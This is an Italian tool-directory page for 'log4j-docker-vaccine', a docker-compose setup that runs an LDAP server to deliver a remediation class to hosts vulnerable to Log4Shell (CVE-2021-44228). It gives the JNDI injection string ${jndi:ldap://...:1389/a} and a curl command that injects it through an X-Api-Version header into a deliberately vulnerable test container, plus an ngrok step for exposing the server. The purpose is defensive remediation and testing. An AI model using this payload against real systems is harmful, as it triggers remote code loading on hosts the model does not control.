Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
log4j-docker-vaccine — soluzione docker compose per eseguire un ambiente vaccinale per la vulnerabilità log4j2 CVE-2021-44228 | Kitploit
Strumenti/GitHubGitHub/jeffbryner/log4j-docker-vaccine
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubjeffbryner/log4j-docker-vaccine

log4j-docker-vaccine

soluzione docker compose per eseguire un ambiente vaccinale per la vulnerabilità log4j2 CVE-2021-44228

Vedi Repository
24 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Log4j Docker Vaccine

Un modo containerizzato per eseguire il vaccino log4j offerto da Cyberreason

  • https://github.com/Cybereason/Logout4Shell

Come farlo girare

Clona questo repository:

root@kitploit:~
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git

Modifica il file containers.env per inserire un IP/DNS privato o pubblico corretto a cui il tuo target possa accedere. La voce predefinita probabilmente non funzionerà per te!

Costruisci ed esegui i container:

root@kitploit:~
docker-compose -f docker-compose.yml -p vaccine up

Ora hai un server ldap in ascolto che servirà la classe Log4jRCE per inoculare un'istanza vulnerabile di log4j.

Puoi esporre questo servizio su internet (se vuoi) utilizzando ngrok.

  • https://dashboard.ngrok.com/get-started/setup
root@kitploit:~
ngrok tcp 1389

Puoi inviare a questo server un'istanza vulnerabile di log4j utilizzando la famigerata stringa di input jndi:

root@kitploit:~
${jndi:ldap://<ngrokurlgoeshere>:1389/a}

Test

Esiste una versione volutamente vulnerabile di log4j in un container disponibile all'indirizzo:

  • https://github.com/christophetd/log4shell-vulnerable-app

Puoi seguire le loro istruzioni per avviarlo e usarlo per i test:

root@kitploit:~
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app

E attiva l'inoculazione tramite:

root@kitploit:~
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a'
Scarica lo strumento